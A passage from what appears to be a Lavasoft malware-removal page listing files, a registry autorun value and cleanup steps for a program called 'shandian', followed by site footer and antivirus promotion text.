    %Documents and Settings%\%current user%\Start Menu\Programs\ÉÁµçä¯ÀÀÆ÷\жÔØÉÁµçä¯ÀÀÆ÷.lnk (507 bytes)
    %Program Files%\shandian\home.bat (703 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\ÉÁµçä¯ÀÀÆ÷\ÉÁµçä¯ÀÀÆ÷.lnk (517 bytes)
    %Program Files%\shandian\ico\anquan.ico (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\bind.dll (1989 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\xID.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\config.ini (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Program Files%\shandian\config.ini (194 bytes)
    %Documents and Settings%\%current user%\Desktop\ÉÁµçä¯ÀÀÆ÷.lnk (485 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\Md5dll.dll (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].htm (2 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "shandian" = "%Program Files%\shandian\shandian.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now